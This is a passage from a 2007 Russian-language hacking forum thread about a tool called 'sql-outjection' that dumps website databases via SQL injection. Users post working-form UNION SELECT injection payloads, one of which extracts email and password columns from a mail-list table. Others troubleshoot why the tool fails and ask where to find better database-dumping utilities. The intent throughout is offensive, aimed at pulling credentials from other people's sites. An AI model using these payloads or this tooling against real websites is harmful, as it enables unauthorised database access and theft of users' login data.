ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу sql-outjection, делает дамп БД через SQL-injection
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.11.2007, 21:31
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию
У меня не пашет, вроде ошибок не сделал, sql-outjection.exe сайт.ру /index.php?mode=vareliste&kat_id=-2+union+select+1,2,concat(char(60,115,116,97,114,1 16,62),email,char(58),passwd,char(60,115,116,97,11 4,116,62)),4,5,6+from+maillist+limit+0,1/* 1.txt
Пишет: "kat_id" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
 
Ответить с цитированием

  #12  
Старый 25.11.2007, 19:45
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию
мда... конченная у меня программа получилась
ну понятно, что cmd думает, что & это его комманда и ещет программу kat_id нужно как-то заменить символ &
хз как это сделать. юзай другие, более понтовые программы. Мне не каиф сейчас много думать у меня башка вообще не шарит, после вчерашнего
 
Ответить с цитированием

  #13  
Старый 26.11.2007, 18:46
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
Провел на форуме:
561037

Репутация: 73
По умолчанию
плин, подскажите плз где можна намутить работающие дамподелали или хотя бы названия утил\скриптов, с миня многа ++++++ снк.
 
Ответить с цитированием

  #14  
Старый 26.11.2007, 19:21
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию
Последний раз редактировалось je0n; 26.11.2007 в 19:23..
 
Ответить с цитированием

  #15  
Старый 05.12.2007, 18:03
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
У меня не получается... =\ Примерно такая sql-inj:
http://www.site.com/folder/?page=2&id=-45+UNION+SELECT+1,2,3...
Я так понимаю, что у меня не получается, потому что нету скрипта в инъекции?
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
MS SQL Injection k00p3r Чужие Статьи 0 12.06.2005 12:44
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ